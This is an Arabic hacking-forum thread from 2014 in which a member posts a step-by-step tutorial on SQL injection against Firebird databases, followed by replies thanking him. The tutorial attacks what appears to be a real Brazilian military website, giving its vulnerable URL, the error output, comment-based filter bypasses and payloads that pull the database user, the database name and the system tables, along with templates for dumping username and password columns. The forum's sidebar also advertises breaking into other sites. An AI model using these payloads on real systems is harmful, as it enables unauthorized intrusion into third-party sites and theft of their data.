1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] حقن قواعد Basic Firebirds

الموضوع في '[ SQL-injection ]' بواسطة AsSad HOmS, بتاريخ ‏25 أكتوبر 2014.

كاتب الموضوع : AsSad HOmS المشاهدات : 492 الردود : 9 ‏25 أكتوبر 2014
حالة الموضوع:
مغلق
  1. غير متصل

    AsSad HOmS
    rank
    V • I • P

    عضو منذ:
    ‏15 مارس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:

    بسم الله الرحمن الرحيم




    اليوم معنا شرح لحقن قواعد البيانات (( firebirf)) في البداية لابد من نتعرف على هذه القواعد ""
    =============================
    Firebird قاعدة بياناتSQL وهي الجيل الجديد من interbase 6.0 التي تاتي مرفقة مع الدلفي ولكن ما يميزها :
    - أنها مجانية ومفتوحة المصدر
    - تأخذ ملف واحد فقط امتداه fdb وتستطيع تغيير الامتداد .
    - ضخامة البيانات كـ MS-SQL Server
    - تستخدم نمط معايير SQL-92 في التخاطب معها
    - تدعم Transactions و Record Version و Stored Procedures و Triggers
    - تستطيع صنع تعليمات Udf إضافية بنفسك بواسطة الدلفي .
    - دعمها من قبل بورلاند بواسطة أدوات IBX المتوفرة مع الدلفي .
    - تعمل على نظامي Linux, Windows .
    ===================================
    قبل البدء بالحقن خلينا نميز بين sql / friedird
    اسم الجدول في sql :table_name
    بينما في قواعد friedird : rdb$relation_name


    ==================================
    اسم العمود في sql : column_name


    بينما في قواعد friedird : rdb$field_name


    ----------------------------------------------
    معنا هادا الموقع خلينا نجرب نحقن هل الموقع ؟


    كود:
    http://www.hca.aer.mil.br
    

    الأصابة هنا


    كود:
    http://www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=362

    خلينا نشوف ونضع علامة (') نشوف اذا مصاب و لأ


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    أوك مصاب


    كود:
    Warning: ibase_query() [function.ibase-query]: Dynamic SQL Error SQL error code = -104 as approximate floating-point values in SQL dialect 1, but as 64-bit in E:\HCA\noticias\exibir_noticias.php on line 15
    
    
    Warning: ibase_fetch_row(): supplied argument is not a valid Firebird/InterBase result resource in E:\HCA\noticias\exibir_noticias.php on line 29

    ===================================
    خلينا نستخرج اليوز ((user))


    كود:
    +and+1=user

    كود:
    http://www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=362+and+1=user#
    

    كود:
    Warning: include(http://localhost/noticias/exibir_noticias.php?id=362 and 1=user) [function.include]: failed to open stream: HTTP request failed! HTTP/1.1 400 Bad Request in E:\HCA\externo\index.php on line 239
    
    
    Warning: include() [function.include]: Failed opening 'http://localhost/noticias/exibir_noticias.php?id=362 and 1=user' for inclusion (include_path='.;C:\php5\pear') in E:\HCA\externo\index.php on line 239

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    ماتغير شي معنا لازم نفلتر الأوامر /**/


    كود:
    http://www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=362/**/and/**/1=user#
    

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    تمام اليوزر ((User: CNWR))


    ================================


    نستخرج Database


    كود:
    +and+1=(select+first+1+rdb$relation_name+from+rdb$relations+where+rdb$system_flag=0)--
    

    كود:
    http://www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=362/**/and/**/1=(select/**/first/**/1/**/rdb$relation_name/**/from/**/rdb$relations/**/where/**/rdb$system_flag=0)--#
    

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    الداتا ((Database: CNW_NOTICIAS))


    =====================================
    خلينا نسخترج الجدوال والأعمدة


    أمر استخراج الجدوال


    كود:
    +and+1=select+first+1+skip+0+distinct+cast(rdb$relation_name+as+integer)+from+rdb$relations+where+rdb$system_flag=0)--
    

    كود:
    http://www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=362/**/and/**/1=(select/**/first/**/1/**/skip/**/0/**/distinct/**/rdb$relation_name/**/from/**/rdb$relation_fields)#
    

    اسم الجدوال :((CNW_NOTICIAS))


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    الجدول رقم 2


    كود:
    http://www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=362/**/and/**/1=(select/**/first/**/1/**/skip/**/1/**/distinct/**/rdb$relation_name/**/from/**/rdb$relation_fields)#
    

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    الجدول رقم :RDB$CHARACTER_SETS


    الجدول رقم 3


    كود:
    http://www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=362/**/and/**/1=(select/**/first/**/1/**/skip/**/2/**/distinct/**/rdb$relation_name/**/from/**/rdb$relation_fields)#
    

    RDB$CHECK_CONSTRAINTS


    متل ملاحظين في شي عم يتغير بين حقنة والتاني في استخراج الجدوال هوي عم نضيف رقم بلشنا من الصفر هون ((skip/**/0/**/distinct/)) منضيف أرقام حتى يطلع معنا جدول اليوزر


    كود:
    http://www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=362/**/and/**/1=(select/**/first/**/1/**/skip/**/31/**/distinct/**/rdb$relation_name/**/from/**/rdb$relation_fields)#
    

    جدول اليوزر RDB$USER_PRIVILEGES


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

    =========================================
    استخراج الأعمدة


    الامر


    كود:
    +and+1=(select+first+1+skip+0+distinct+rdb$field_name+from+rdb$relation_fields+where+rdb$relation_name=(select+first+1+skip+0+distinct+rdb$relation_name+from+rdb$relation_fields))--

    كود:
    http://www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=362/**/and/**/1=%28select/**/first/**/1/**/skip/**/0/**/rdb$field_name/**/from/**/rdb$relation_fields/**/where/**/rdb$relation_name=%28select/**/first/**/1/**/skip/**/31/**/distinct/**/rdb$relation_name/**/from/**/rdb$relation_fields%29%29--#
    

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    عامود اليوزر RDB$USER


    كذا نفس الامر للانتقال للعامود التالي بالتخطي اضافة رقم skip/**/0/


    راح نستخرج معلومات العامود


    كود:
    +and+1=(select+first+1+skip+0+column+from+table)
    

    هادا الامر لاستخراج عامودين مع بعض متل اليوزر الباس


    كود:
    +and+1=(select+first+1+skip+0+column1||column2+from+table)
    

    كود:
    www.hca.aer.mil.br/externo/index.php?pag=noticias/exibir_noticias.php?id=362/**/and/**/1=(select/**/first/**/1/**/skip/**/0/**/RDB$USER/**/from/**/RDB$USER_PRIVILEGES)#
    

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]

     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    Ameer Eagle V.I.P
    V • I • P

    عضو منذ:
    ‏7 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,777
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:

    رد: حقن قواعد Basic Firebirds

    عاشت الايادي ابو جاسم
    i:q^:
     


  3. غير متصل

    м̨я.ǚs̲ǝя <div style="border-right: 5px solid; padding: 2px
    ExpErt DeveloPer

    عضو منذ:
    ‏16 ابريل 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    13
    نقاط الجائزة:
    الإقامة:

    رد: حقن قواعد Basic Firebirds

    جزك الله‌ خیر
     


  4. غير متصل

    Jeo Sawager
    Developer

    عضو منذ:
    ‏15 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: حقن قواعد Basic Firebirds

    بآرك آلله بيك شرح وآضح جدآ ,
    ماذا تعتقد في مشاركة AsSad HOmS؟يعجبني ويستحق التقييم
    :{1!}:
     


  5. غير متصل

    Alsafa7 سيد الساحة
    V • I • P

    عضو منذ:
    ‏11 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,752
    نقاط الجائزة:
    الجنس:
    ذكر

    58

    رد: حقن قواعد Basic Firebirds

    بارك الله بك ياطيب شرح واضح وسلس واصل مجهودك المميز
     


  6. غير متصل

    Dr.Attack
    rankrank
    Developer

    عضو منذ:
    ‏3 أغسطس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الإقامة:

    رد: حقن قواعد Basic Firebirds

    شكرا لك على مجهودك الجبار
    موفق اخي
     


  7. غير متصل

    No-Security <span style="font-weight: bold; text-shadow: #BBBB
    DeveloPer Plus

    عضو منذ:
    ‏16 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:

    رد: حقن قواعد Basic Firebirds

    شكرا لك على الطريح الجميل يا رائع
     


  8. غير متصل

    AsSad HOmS
    rank
    V • I • P

    عضو منذ:
    ‏15 مارس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    5
    نقاط الجائزة:

    رد: حقن قواعد Basic Firebirds

    منورين شباب هدا ولا شي انتظروا البرايفيت
     


  9. غير متصل

    South Hack أبو حسين
    DeveloPer Plus

    عضو منذ:
    ‏15 نوفمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:
    الإقامة:

    رد: حقن قواعد Basic Firebirds

    استمر وفيد اعضاء تيم العراق

    تقبل مروري :!."
     


  10. غير متصل

    عہلي الصہقہور هنہا أنا الله وأنا ليه راجعون
    V • I • P

    عضو منذ:
    ‏29 نوفمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    الإقامة:

    رد: حقن قواعد Basic Firebirds

    عاشت ايدك اخي الغالي موضوع رائع

     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...